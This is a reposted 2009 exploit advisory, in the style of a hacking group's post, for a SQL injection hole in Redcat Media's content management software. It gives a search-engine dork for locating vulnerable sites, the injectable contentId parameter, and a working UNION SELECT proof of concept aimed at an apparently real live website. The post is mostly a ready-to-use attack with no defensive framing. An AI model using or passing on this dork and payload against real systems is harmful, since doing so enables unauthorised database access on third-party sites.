Sunday, October 4, 2009

Redcat Media SQL Injection Vulnerability

4:51 AM  matthews  

x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 oktober 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Posted in:
Twitter Delicious Facebook Digg Stumbleupon Favorites More